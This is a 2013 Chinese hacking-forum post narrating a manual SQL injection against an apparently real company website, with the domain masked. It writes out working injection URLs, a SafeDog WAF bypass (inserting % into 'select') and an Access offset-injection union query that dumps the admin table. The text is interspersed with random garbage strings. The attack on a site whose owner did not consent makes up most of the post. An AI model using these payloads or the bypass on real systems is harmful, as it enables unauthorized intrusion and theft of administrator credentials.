找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2062|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。
7 f" h& }( {" L1 ?; v9 f! J
, m( f) K" q8 a: X: O* R* c* h0 a; Z' v" l8 A& Q
顺手加个admin% E1 T3 Y$ i! {! l% u
6 c  T9 @# [7 ~: v2 @

3 X! k) O! K/ S默认后台。- M* ]! \, l* c' E) N& ^# V
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​
! _  C. @. F3 z% ]/ c* q6 E& r8 n; O8 J
* F5 n% ~5 S& G+ K5 z7 l! S# o

  }8 e& r+ i$ o! f: L. r所以就不用御剑扫了,待会直接封IP。! p5 C9 H% W# ]4 B
$ E) {6 l! \. g! j
用order by语句判断是否存在注入。
% j; U- e; Y$ \! f* \http://www.xxx.com /product_show.asp?id=997 order by 1' t- j+ p1 F5 S+ n8 G$ l
http://www.xxx.com /product_show.asp?id=997 order by 100
4 z' ^& Z9 a9 W) T4 z1 ~现在存在注入,经测试后发现是9个字段。
2 ~- O; J: b7 `5 g5 \1 B% G7 q- k
( t, R# H8 a7 @# P; @1 K接下来进行联合查询,猜是否存在admin表。
: p/ R& Q4 j9 A6 N5 u' s+ mhttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​$ h3 ~: I$ l5 W/ A1 n( m- w
/ T6 j+ j* _+ m  l8 f

( b; e9 f/ I4 b( a  W. Q# _* ]" i; E! ^- z3 ^/ Z3 S( f# |
在select中间加个%,se%lect绕过安全狗。7 `2 k/ T( Q, s. t6 e1 X
+ }) F3 O) E. ?, K" a
0 s) ~" ?, j4 Y/ f
发现存在admin表,然后开始手工猜常用的字段。9 l% V: w$ H" q' c8 v* z7 W4 e
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。- R4 r, _% L  T0 }' ?/ D

9 C$ O( }( S4 k( R突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。" N2 C- I2 B) J

$ @+ F+ a) `7 A  g科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
. n8 _0 X7 V, g; Ghttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
6 D/ J# K# a% w4 J* g) O$ C好了,敏感内容出显了。​
4 W8 v* a, g: M" k9 d' R  s
& B2 E- L$ @& @  k
* z' b0 a" P8 e# {, i* E
' v$ p$ X( `( m$ v' f! ~  F2 d; U
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表